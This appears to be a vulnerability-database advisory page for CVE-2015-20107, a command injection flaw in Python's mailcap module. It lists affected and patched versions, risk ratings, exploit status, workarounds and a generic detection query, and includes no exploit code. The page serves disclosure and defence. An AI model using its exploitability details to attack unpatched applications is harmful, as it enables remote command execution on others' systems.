Login Sign Up

CVE-2015-20107

7.6 HIGH
Remote Code Execution

📋 TL;DR

This vulnerability in Python's mailcap module allows shell command injection when applications call mailcap.findmatch() with untrusted input. Attackers can execute arbitrary commands on affected systems. Applications using Python's mailcap module with user-provided filenames or arguments are vulnerable.

💻 Affected Systems

Products:
  • Python (CPython)
Versions: Python 3.7 through 3.10.8
Operating Systems: All operating systems running affected Python versions
Default Config Vulnerable: ⚠️ Yes
Notes: Only vulnerable when applications use mailcap.findmatch() with untrusted input. The vulnerability is in the mailcap module itself.

📦 What is this software?

Active Iq Unified Manager by Netapp

View all CVEs affecting Active Iq Unified Manager →

Active Iq Unified Manager by Netapp

View all CVEs affecting Active Iq Unified Manager →

Fedora by Fedoraproject

View all CVEs affecting Fedora →

Fedora by Fedoraproject

View all CVEs affecting Fedora →

Fedora by Fedoraproject

View all CVEs affecting Fedora →

Ontap Select Deploy Administration Utility by Netapp

View all CVEs affecting Ontap Select Deploy Administration Utility →

Python by Python

Python is a high-level, interpreted programming language known for its readability and versatility. It is widely used in web development, data science, automation, and scientific computing.

Learn more about Python →

Python by Python

Python is a high-level, interpreted programming language known for its readability and versatility. It is widely used in web development, data science, automation, and scientific computing.

Learn more about Python →

Python by Python

Python is a high-level, interpreted programming language known for its readability and versatility. It is widely used in web development, data science, automation, and scientific computing.

Learn more about Python →

Python by Python

Python is a high-level, interpreted programming language known for its readability and versatility. It is widely used in web development, data science, automation, and scientific computing.

Learn more about Python →

Snapcenter by Netapp

View all CVEs affecting Snapcenter →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Remote code execution leading to full system compromise, data theft, or ransomware deployment.

🟠

Likely Case

Limited command execution within application context, potentially leading to data leakage or privilege escalation.

🟢

If Mitigated

No impact if input validation is implemented or mailcap module is not used with untrusted data.

🌐 Internet-Facing: MEDIUM - Requires specific application usage patterns and untrusted input to mailcap.findmatch().
🏢 Internal Only: LOW - Most internal applications don't use mailcap module with untrusted input.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires application to call mailcap.findmatch() with attacker-controlled input. Public PoC exists in Python bug tracker.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Python 3.10.9, 3.9.16, 3.8.16, 3.7.16

Vendor Advisory: https://bugs.python.org/issue24778

Restart Required: No

Instructions:

1. Upgrade Python to patched version. 2. For Python 3.10.x: upgrade to 3.10.9+. 3. For Python 3.9.x: upgrade to 3.9.16+. 4. For Python 3.8.x: upgrade to 3.8.16+. 5. For Python 3.7.x: upgrade to 3.7.16+.

🔧 Temporary Workarounds

Input Validation

all

Validate and sanitize all user input before passing to mailcap.findmatch()

Avoid mailcap.findmatch() with untrusted input

all

Do not use mailcap.findmatch() with user-provided filenames or arguments

🧯 If You Can't Patch

  • Implement strict input validation for all parameters passed to mailcap.findmatch()
  • Audit codebase for mailcap.findmatch() usage and ensure it's not called with untrusted input

🔍 How to Verify

Check if Vulnerable:

Check Python version: python3 --version. If version is between 3.7.0-3.7.15, 3.8.0-3.8.15, 3.9.0-3.9.15, or 3.10.0-3.10.8, system is vulnerable.

Check Version:

python3 --version

Verify Fix Applied:

After patching, verify Python version is 3.7.16+, 3.8.16+, 3.9.16+, or 3.10.9+

📡 Detection & Monitoring

Log Indicators:

  • Unexpected shell command execution from Python processes
  • Abnormal mailcap module usage patterns

Network Indicators:

  • Outbound connections from Python processes not expected to make network calls

SIEM Query:

Process execution where parent_process contains 'python' AND command_line contains unexpected shell metacharacters

📊 Metadata

CVE ID: CVE-2015-20107
CVSS v3 Score: 7.6 (HIGH)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L
CWE: CWE-77
Published: April 13, 2022
Last Updated: November 3, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2015-20107, you might also want to check these:

CVE-2024-48841 10.0

This critical vulnerability in FLXEON software allows remote attackers to execute arbitrary code wit...

Same vulnerability type (CWE-77)
CVE-2025-59818 10.0

This vulnerability allows authenticated attackers to execute arbitrary system commands by manipulati...

Same vulnerability type (CWE-77)
CVE-2024-28354 10.0

This is a critical command injection vulnerability in TRENDnet TEW-827DRU routers that allows remote...

Same vulnerability type (CWE-77)